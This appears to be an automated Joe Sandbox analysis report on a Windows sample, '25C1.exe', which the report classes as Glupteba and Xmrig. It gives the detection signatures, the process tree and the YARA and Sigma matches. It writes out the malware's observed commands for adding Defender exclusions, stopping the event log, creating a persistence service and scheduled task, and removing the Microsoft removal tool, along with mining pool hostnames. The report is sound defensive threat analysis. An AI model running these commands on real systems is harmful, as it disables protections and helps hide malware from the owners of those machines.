Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
25C1.exe

Overview

General Information

Sample name:25C1.exe
Analysis ID:1480049
MD5:ceae65ee17ff158877706edfe2171501
SHA1:b1f807080da9c25393c85f5d57105090f5629500
SHA256:0dac8a3fe3c63611b49db21b2756b781cc4c9117c64007e0c23e6d3e7ca9ee49
Tags:exeStealc
Infos:

Detection

Glupteba, Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Stop EventLog
Yara detected Glupteba
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Connects to a pastebin service (likely for C&C)
DNS related to crypt mining pools
Found Tor onion address
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 25C1.exe (PID: 7600 cmdline: "C:\Users\user\Desktop\25C1.exe" MD5: CEAE65EE17FF158877706EDFE2171501)
    • 288c47bbc1871b439df19ff4df68f076.exe (PID: 7692 cmdline: "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe" MD5: D122F827C4FC73F9A06D7F6F2D08CD95)
      • powershell.exe (PID: 8172 cmdline: powershell -nologo -noprofile MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 8188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • 288c47bbc1871b439df19ff4df68f076.exe (PID: 8068 cmdline: "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe" MD5: D122F827C4FC73F9A06D7F6F2D08CD95)
        • powershell.exe (PID: 4512 cmdline: powershell -nologo -noprofile MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 3856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WerFault.exe (PID: 7636 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7692 -s 844 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • InstallSetup4.exe (PID: 7712 cmdline: "C:\Users\user\AppData\Local\Temp\InstallSetup4.exe" MD5: 28B72E7425D6D224C060D3CF439C668C)
      • BroomSetup.exe (PID: 7748 cmdline: C:\Users\user\AppData\Local\Temp\BroomSetup.exe MD5: 5E94F0F6265F9E8B2F706F1D46BBD39E)
        • cmd.exe (PID: 8000 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 8008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • chcp.com (PID: 8040 cmdline: chcp 1251 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
          • schtasks.exe (PID: 8060 cmdline: schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\user\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F MD5: 48C2FE20575769DE916F48EF0676A965)
    • FourthX.exe (PID: 7740 cmdline: "C:\Users\user\AppData\Local\Temp\FourthX.exe" MD5: B03886CB64C04B828B6EC1B2487DF4A4)
      • powershell.exe (PID: 7788 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7392 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • wusa.exe (PID: 7420 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
        • conhost.exe (PID: 6404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7424 cmdline: C:\Windows\system32\sc.exe delete "UTIXDCVF" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 6612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7556 cmdline: C:\Windows\system32\sc.exe create "UTIXDCVF" binpath= "C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7800 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7884 cmdline: C:\Windows\system32\sc.exe start "UTIXDCVF" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • vueqjgslwynd.exe (PID: 1212 cmdline: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe MD5: B03886CB64C04B828B6EC1B2487DF4A4)
    • powershell.exe (PID: 1692 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7608 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 3108 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • conhost.exe (PID: 2144 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • explorer.exe (PID: 2836 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • TrustedInstaller.exe (PID: 1524 cmdline: C:\Windows\servicing\TrustedInstaller.exe MD5: D098F2FC042FBF6879D47E3A86FBB4A1)
  • svchost.exe (PID: 2292 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 8032 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 7964 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 7692 -ip 7692 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 6608 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
GluptebaGlupteba is a trojan horse malware that is one of the top ten malware variants of 2021. After infecting a system, the Glupteba malware can be used to deliver additional malware, steal user authentication information, and enroll the infected system in a cryptomining botnet.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
25C1.exeMALWARE_Win_DLInjector04Detects downloader / injectorditekSHen
  • 0x8ad454:$s1: Runner
  • 0x8ad5b9:$s3: RunOnStartup
  • 0x8ad468:$a1: Antis
  • 0x8ad495:$a2: antiVM
  • 0x8ad49c:$a3: antiSandbox
  • 0x8ad4a8:$a4: antiDebug
  • 0x8ad4b2:$a5: antiEmulator
  • 0x8ad4bf:$a6: enablePersistence
  • 0x8ad4d1:$a7: enableFakeError
  • 0x8ad5e2:$a8: DetectVirtualMachine
  • 0x8ad607:$a9: DetectSandboxie
  • 0x8ad632:$a10: DetectDebugger
  • 0x8ad641:$a11: CheckEmulator

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\BroomSetup.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000027.00000003.1502667713.00000000014B5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        00000027.00000002.3820414733.0000000001431000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          00000027.00000003.1502528304.0000000001E56000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            00000027.00000003.1503963151.00000000014B5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
              00000027.00000002.3820414733.00000000013D9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                Click to see the 22 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                0.0.25C1.exe.520000.0.unpackMALWARE_Win_DLInjector04Detects downloader / injectorditekSHen
                • 0x8ad454:$s1: Runner
                • 0x8ad5b9:$s3: RunOnStartup
                • 0x8ad468:$a1: Antis
                • 0x8ad495:$a2: antiVM
                • 0x8ad49c:$a3: antiSandbox
                • 0x8ad4a8:$a4: antiDebug
                • 0x8ad4b2:$a5: antiEmulator
                • 0x8ad4bf:$a6: enablePersistence
                • 0x8ad4d1:$a7: enableFakeError
                • 0x8ad5e2:$a8: DetectVirtualMachine
                • 0x8ad607:$a9: DetectSandboxie
                • 0x8ad632:$a10: DetectDebugger
                • 0x8ad641:$a11: CheckEmulator
                32.2.288c47bbc1871b439df19ff4df68f076.exe.400000.7.unpackJoeSecurity_GluptebaYara detected GluptebaJoe Security
                  32.2.288c47bbc1871b439df19ff4df68f076.exe.2da0e67.12.unpackJoeSecurity_GluptebaYara detected GluptebaJoe Security
                    2.2.288c47bbc1871b439df19ff4df68f076.exe.2d70e67.11.unpackJoeSecurity_GluptebaYara detected GluptebaJoe Security
                      5.0.BroomSetup.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                        Click to see the 3 entries

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\FourthX.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\FourthX.exe, ParentProcessId: 7740, ParentProcessName: FourthX.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7788, ProcessName: powershell.exe
                        Sigma detected: Powershell Defender Exclusion
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\FourthX.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\FourthX.exe, ParentProcessId: 7740, ParentProcessName: FourthX.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7788, ProcessName: powershell.exe
                        Sigma detected: Suspicious Schtasks From Env Var Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\user\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F, CommandLine: schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\user\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8000, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\user\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F, ProcessId: 8060, ProcessName: schtasks.exe
                        Sigma detected: New Service Creation Using Sc.EXE
                        Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "UTIXDCVF" binpath= "C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "UTIXDCVF" binpath= "C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\FourthX.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\FourthX.exe, ParentProcessId: 7740, ParentProcessName: FourthX.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "UTIXDCVF" binpath= "C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe" start= "auto", ProcessId: 7556, ProcessName: sc.exe
                        Sigma detected: Non Interactive PowerShell Process Spawned
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\FourthX.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\FourthX.exe, ParentProcessId: 7740, ParentProcessName: FourthX.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7788, ProcessName: powershell.exe
                        Sigma detected: Windows Processes Suspicious Parent Directory
                        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon, CommandLine: C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon, ProcessId: 2292, ProcessName: svchost.exe

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Sigma detected: Stop EventLog
                        Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\FourthX.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\FourthX.exe, ParentProcessId: 7740, ParentProcessName: FourthX.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 7800, ProcessName: sc.exe

                        Snort Signatures

                        No Snort rule has matched

                        Suricata Signatures

                        Timestamp:2024-07-24T14:31:33.322221+0200
                        SID:2856233
                        Source Port:49706
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus / Scanner detection for submitted sample
                        Source: 25C1.exeAvira: detected
                        Antivirus detection for dropped file
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeAvira: detection malicious, Label: TR/Drop.Agent.ojaga
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exeAvira: detection malicious, Label: TR/Kryptik.hzhfn
                        Source: C:\Users\user\AppData\Local\Temp\FourthX.exeAvira: detection malicious, Label: TR/Kryptik.hzhfn
                        Multi AV Scanner detection for dropped file
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exeReversingLabs: Detection: 91%
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeReversingLabs: Detection: 87%
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeReversingLabs: Detection: 75%
                        Source: C:\Users\user\AppData\Local\Temp\FourthX.exeReversingLabs: Detection: 91%
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeReversingLabs: Detection: 87%
                        Multi AV Scanner detection for submitted file
                        Source: 25C1.exeReversingLabs: Detection: 78%
                        Yara detected Glupteba
                        Source: Yara matchFile source: 32.2.288c47bbc1871b439df19ff4df68f076.exe.400000.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 32.2.288c47bbc1871b439df19ff4df68f076.exe.2da0e67.12.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.288c47bbc1871b439df19ff4df68f076.exe.2d70e67.11.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.288c47bbc1871b439df19ff4df68f076.exe.400000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.3.288c47bbc1871b439df19ff4df68f076.exe.3660000.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 32.3.288c47bbc1871b439df19ff4df68f076.exe.3690000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000020.00000002.1591528645.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000020.00000002.1587040107.0000000000843000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000020.00000003.1494671167.0000000003AD2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 288c47bbc1871b439df19ff4df68f076.exe PID: 7692, type: MEMORYSTR
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                        Machine Learning detection for dropped file
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeJoe Sandbox ML: detected
                        Machine Learning detection for sample
                        Source: 25C1.exeJoe Sandbox ML: detected

                        Bitcoin Miner

                        barindex
                        Yara detected Glupteba
                        Source: Yara matchFile source: 32.2.288c47bbc1871b439df19ff4df68f076.exe.400000.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 32.2.288c47bbc1871b439df19ff4df68f076.exe.2da0e67.12.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.288c47bbc1871b439df19ff4df68f076.exe.2d70e67.11.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.288c47bbc1871b439df19ff4df68f076.exe.400000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.3.288c47bbc1871b439df19ff4df68f076.exe.3660000.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 32.3.288c47bbc1871b439df19ff4df68f076.exe.3690000.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000020.00000002.1591528645.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000020.00000002.1587040107.0000000000843000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000020.00000003.1494671167.0000000003AD2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 288c47bbc1871b439df19ff4df68f076.exe PID: 7692, type: MEMORYSTR
                        Yara detected Xmrig cryptocurrency miner
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Source: Yara matchFile source: 00000027.00000003.1502667713.00000000014B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000027.00000002.3820414733.0000000001431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000027.00000003.1502528304.0000000001E56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000027.00000003.1503963151.00000000014B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000027.00000002.3820414733.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000027.00000003.1504028725.0000000001E43000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000027.00000003.1503587405.0000000001E27000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000027.00000003.1503587405.0000000001E43000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000027.00000003.1502528304.0000000001E4B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000027.00000003.1504082814.0000000001E36000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000027.00000003.1503356384.0000000001E78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000027.00000003.1503661320.00000000014B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000027.00000003.1503356384.0000000001E57000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000027.00000002.3820414733.00000000014AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000027.00000002.3822093253.0000000001E2B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        DNS related to crypt mining pools
                        Source: unknownDNS query: name: xmr-eu1.nanopool.org
                        Source: unknownDNS query: name: xmr-eu2.nanopool.org

                        Compliance

                        barindex
                        Detected unpacking (overwrites its own PE header)
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeUnpacked PE file: 2.2.288c47bbc1871b439df19ff4df68f076.exe.400000.5.unpack
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeUnpacked PE file: 32.2.288c47bbc1871b439df19ff4df68f076.exe.400000.7.unpack
                        Source: 25C1.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                        Source: 25C1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: C:\xericuzakiziy64\dayolev xadesowip kijo.pdbT source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000000.1358564663.0000000000807000.00000002.00000001.01000000.00000006.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000020.00000000.1462221086.0000000000807000.00000002.00000001.01000000.00000006.sdmp
                        Source: Binary string: Loader.pdb source: 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, 288c47bbc1871b439df19ff4df68f076.exe, 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp
